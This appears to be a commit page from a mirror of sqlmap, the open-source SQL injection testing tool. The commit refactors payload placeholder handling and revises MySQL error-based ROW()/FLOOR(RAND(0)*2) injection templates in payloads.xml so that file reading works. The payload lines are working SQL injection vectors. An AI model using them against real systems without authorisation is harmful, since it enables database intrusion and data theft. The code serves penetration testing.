sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-16 19:40:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

fixing an issue with --file-read and ROW() MySQL payload (it's internal caching mechanism prevents error message if FROM part is not unique enough dumping only partial file content); minor refactoring

Browse Source
This commit is contained in:
Miroslav Stampar 2012-05-22 09:33:22 +00:00
parent 2c057d5b3d
commit 2538e2d5b4
6 changed files with 20 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
lib/controller/checks.py
View File

@ -488,9 +488,6 @@ def checkSqlInjection(place, parameter, value):
if vector is None and "vector" in test and test.vector is not None: if vector is None and "vector" in test and test.vector is not None:
vector = "%s%s" % (test.vector, comment or "") vector = "%s%s" % (test.vector, comment or "")
if method == PAYLOAD.METHOD.TIME:
reqPayload = reqPayload.replace(test.request.payload.replace("[SLEEPTIME]", str(conf.timeSec)), test.request.payload)
injection.data[stype] = AttribDict() injection.data[stype] = AttribDict()
injection.data[stype].title = title injection.data[stype].title = title
injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload) injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)

2
lib/controller/controller.py
View File

@ -138,7 +138,7 @@ def __formatInjection(inj):
title = title.replace("columns", "column") title = title.replace("columns", "column")
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype] data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
data += " Title: %s\n" % title data += " Title: %s\n" % title
data += " Payload: %s\n" % (sdata.payload if stype not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) else sdata.payload.replace("[SLEEPTIME]", str(conf.timeSec))) data += " Payload: %s\n" % agent.adjustLateValues(sdata.payload)
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n" data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
return data return data

24
lib/core/agent.py
View File

@ -212,20 +212,19 @@ class Agent:
if payload is None: if payload is None:
return return
randInt = randomInt()
randInt1 = randomInt()
randInt2 = randomInt()
randStr = randomStr()
randStr1 = randomStr()
_ = ( _ = (
("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDNUM2]", str(randInt2)), ("[RANDSTR]", randStr),\ ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\ ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
("[HASH_REPLACE]", kb.chars.hash_) ("[HASH_REPLACE]", kb.chars.hash_)
) )
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload) payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
payload = payload.replace(_, str(randomInt()))
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
payload = payload.replace(_, randomStr())
if origValue is not None: if origValue is not None:
payload = payload.replace("[ORIGVALUE]", origValue) payload = payload.replace("[ORIGVALUE]", origValue)
@ -249,12 +248,15 @@ class Agent:
return payload return payload
def adjustSleepTime(self, payload): def adjustLateValues(self, payload):
""" """
Returns payload with a replaced tag for SLEEPTIME Returns payload with a replaced late tags (e.g. SLEEPTIME)
""" """
return payload.replace("[SLEEPTIME]", str(conf.timeSec)) if payload else payload if payload:
payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
return payload
def getComment(self, request): def getComment(self, request):
""" """

2
lib/request/connect.py
View File

@ -540,7 +540,7 @@ class Connect:
raise404 = place != PLACE.URI if raise404 is None else raise404 raise404 = place != PLACE.URI if raise404 is None else raise404
value = agent.adjustSleepTime(value) value = agent.adjustLateValues(value)
payload = agent.extractPayload(value) payload = agent.extractPayload(value)
threadData = getCurrentThreadData() threadData = getCurrentThreadData()

2
lib/request/direct.py
View File

@ -28,7 +28,7 @@ from lib.utils.timeout import timeout
def direct(query, content=True): def direct(query, content=True):
select = True select = True
query = agent.payloadDirect(query) query = agent.payloadDirect(query)
query = agent.adjustSleepTime(query) query = agent.adjustLateValues(query)
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query: if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query:

8
xml/payloads.xml
View File

@ -1215,9 +1215,9 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</vector> <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</vector>
<request> <request>
<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</payload> <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</payload>
</request> </request>
<response> <response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@ -1433,9 +1433,9 @@ Formats:
<risk>2</risk> <risk>2</risk>
<clause>1</clause> <clause>1</clause>
<where>2</where> <where>2</where>
<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</vector> <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</vector>
<request> <request>
<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</payload> <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</payload>
</request> </request>
<response> <response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>